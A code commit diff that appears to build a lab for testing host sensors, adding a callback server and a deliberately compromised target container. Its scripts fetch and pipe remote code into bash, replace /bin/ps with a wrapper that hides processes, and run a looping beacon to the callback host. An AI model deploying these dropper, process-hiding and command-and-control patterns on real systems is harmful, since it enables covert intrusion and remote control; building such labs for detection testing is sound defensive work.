First cut of a dropper with a callback server

NextCenturyCorporation · Dec 24, 2017 · 90205af · 90205af
1 parent 6e1520c
commit 90205af
Show file tree

Hide file tree

Showing 8 changed files with 74 additions and 1 deletion.
diff --git a/docker-compose.yml b/docker-compose.yml
@@ -42,4 +42,17 @@ services:
     depends_on:
       - kafka
       - api
-    command: python lsof_sensor.py --public-key-path ./cert/rsa_key.pub --private-key-path ./cert/rsa_key --api-host api --sensor-port 11001 --sensor-hostname sensor_2
+    command: python lsof_sensor.py --public-key-path ./cert/rsa_key.pub --private-key-path ./cert/rsa_key --api-host api --sensor-port 11001 --sensor-hostname sensor_2
+  dropper_callback:
+    build: "./external/dropper_callback"
+    ports:
+      - "8080:8080"
+    # hostname: dropper1
+    # domainname: evil.io
+  target_1:
+    build: "./targets/base"
+    depends_on:
+      - kafka
+      - api
+    stdin_open: true
+    tty: true
diff --git a/external/dropper_callback/Dockerfile b/external/dropper_callback/Dockerfile
@@ -0,0 +1,8 @@
+FROM python:3.6
+
+WORKDIR /opt/callback/
+
+COPY loader.sh /opt/callback/loader.sh
+COPY c2.sh /opt/callback/c2.sh
+
+CMD ["python","-m","http.server","8080"]
diff --git a/external/dropper_callback/README.md b/external/dropper_callback/README.md
@@ -0,0 +1,4 @@
+# Dropper Callback Server
+
+This container will start a python http.server serving up scripts and files for
+droppers to download.
diff --git a/external/dropper_callback/c2.sh b/external/dropper_callback/c2.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+
+echo "Malware commands received"
diff --git a/external/dropper_callback/loader.sh b/external/dropper_callback/loader.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+
+echo "DROPPED"
+
+# Replace ps with a filtered ps
+PS=`which ps`
+mv $PS /tmp/ps
+cat <<'EOF' > /bin/ps
+#!/bin/bash
+/tmp/ps $@ | grep -v "notevil" | grep -v "dropper" | grep -v "/tmp/ps"
+EOF
+chmod a+x /bin/ps
+
+# Drop in beaconing malware
+cat <<'EOF' > /tmp/notevil.sh
+while true; do
+  curl -s http://dropper_callback:8080/c2.sh | bash
+  sleep 10
+done
+EOF
+
+chmod a+x /tmp/notevil.sh
+
+/tmp/notevil.sh &
diff --git a/targets/base/Dockerfile b/targets/base/Dockerfile
@@ -0,0 +1,5 @@
+FROM savior_sensor_1:latest
+
+COPY dropper.sh /tmp/dropper.sh
+
+CMD ["/bin/bash","/tmp/dropper.sh"]
diff --git a/targets/base/README.md b/targets/base/README.md
@@ -0,0 +1,7 @@
+This container has been compromised with a dropper script "white-carded" onto
+the system. The container will run `dropper.sh` which will reach out to
+the `dropper_callback` container on port `8080` to a second stage malware and
+execute it.
+
+The second stage `loader.sh` will attempt to hide its next stage by replacing (albeit quite poorly)
+`/bin/ps` before executing `notevil.sh`.
diff --git a/targets/base/dropper.sh b/targets/base/dropper.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+curl -s http://dropper_callback:8080/loader.sh | bash
+
+# stupid hack to get the container not to shut down
+while true; do
+  sleep 60
+  echo "I'm still awake"
+done